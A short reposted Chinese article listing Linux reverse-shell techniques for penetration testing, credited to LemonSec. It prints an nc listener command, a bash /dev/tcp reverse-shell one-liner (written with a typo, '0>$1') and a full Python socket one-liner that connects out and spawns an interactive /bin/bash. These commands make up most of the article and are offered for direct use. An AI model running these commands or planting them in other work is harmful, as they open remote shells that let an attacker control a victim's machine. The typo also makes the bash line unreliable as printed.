查看原文
其他

几种Linux下反弹shell的方法总结

文章来源:LemonSec

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。

一、nc和bash

在我们的主机上执行 nc -lvp port

表示显示执行过程监听端口

在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1

这样就可以在我们的主机上执行命令了

二、nc和python

在我们的主机上执行 nc -lvp port

表示显示执行过程监听端口

服务端执行以下命令

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

注意修改ip和port为主机的ip和端口

测试效果如下



版权申明:内容来源网络,版权归原创者所有。除非无法确认,我们都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。祝愿每一位读者生活愉快!谢谢!


推荐阅读




*EW入侵内网渗透记录

*渗透测试之个人常用高效爆破字典

*Oracle 常用运维命令整理

                                                                                         

                                                                        


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存